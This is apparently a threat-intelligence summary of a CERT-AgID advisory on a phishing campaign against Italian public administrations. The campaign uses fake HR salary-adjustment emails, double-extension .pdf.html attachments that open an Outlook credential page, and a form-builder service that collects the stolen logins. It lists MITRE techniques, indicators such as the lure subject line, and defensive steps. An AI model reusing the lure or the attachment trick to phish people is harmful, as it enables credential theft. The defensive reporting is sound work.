Keypoints
- Campaign targets Public Administrations with emails impersonating HR or accounting about salary adjustments.
- Emails include an attachment with a double extension (.pdf.html) that leads to a phishing web page requesting Outlook credentials.
- Attackers use a legitimate form builder service (formester.com) to receive stolen credentials.
- Typical red flags: urgent requests, suspicious attachment extension, credential entry requests, generic language, and grammatical errors.
- CERT-AgID published collected IoCs and provided a downloadable JSON with indicators to assist mitigation.
MITRE Techniques
- [T1566] Phishing – Fraudulent emails impersonate HR/accounting to trick users into disclosing credentials ( ‘The attackers, disguising themselves as HR departments or company accounting, are sending fraudulent emails promising salary adjustments… in an attempt to steal login credentials’).
- [T1204.002] User Execution: Malicious File – A deceptive attachment using a double extension is used to entice opening (‘Attachment: double extension .pdf.html’).
- [T1566.002] Phishing: Spearphishing Link – The opened attachment presents a phishing page prompting for Outlook credentials (‘The email in question urges recipients to download the attachment to view the details regarding the “salary adjustment”. This is what the phishing page looks like once the attachment is opened:’).
- [T1567] Exfiltration Over Web Service – Submitted credentials are sent to a third‑party form service (formester.com) to collect stolen data (‘the free service provided by the website formester.com was exploited.’).
Indicators of Compromise
- [Domain] Phishing infrastructure – formester.com (used to host the credential-collection form)
- [File extension / attachment] Malicious attachment pattern – .pdf.html (double-extension attachment used to disguise a webpage)
- [Email subject] Lure content – “Notice of March pay slip adjustment” (subject line used to prompt download and credential entry)
- [IOC feed] Published IoC list – https://cert-agid.gov.it/wp-content/uploads/2024/03/outlook_phishing_26-03-2024.json (downloadable JSON with additional indicators)
The phishing emails impersonate HR or accounting and include a deceptive attachment named with a double extension (.pdf.html). When opened, the attachment serves or redirects to an HTML-based phishing page that mimics an Outlook login and requests users to enter credentials. Attackers used a third-party form builder (formester.com) to receive and store submitted usernames and passwords, enabling easy credential collection without hosting bespoke infrastructure.
Detection should focus on attachments with misleading extensions, unexpected requests to enter credentials, and outbound submissions to unfamiliar third-party domains. Incident response includes blocking the malicious domains and IoC URLs, isolating affected accounts, forcing password resets and multifactor authentication enrollment, and reviewing the IoC JSON provided by CERT-AgID for all known hashes, URLs, and indicators to update filters and email protections.
Preventive steps: train staff to recognize urgency and generic language in HR/accounting notices, configure email gateways to flag double-extension attachments and strip or sandbox suspicious HTML attachments, enforce MFA for Outlook accounts, and monitor logs for authentication attempts or credential submissions to external web services.
Read more: https://cert-agid.gov.it/news/campagna-di-phishing-outlook-rivolta-alle-pa/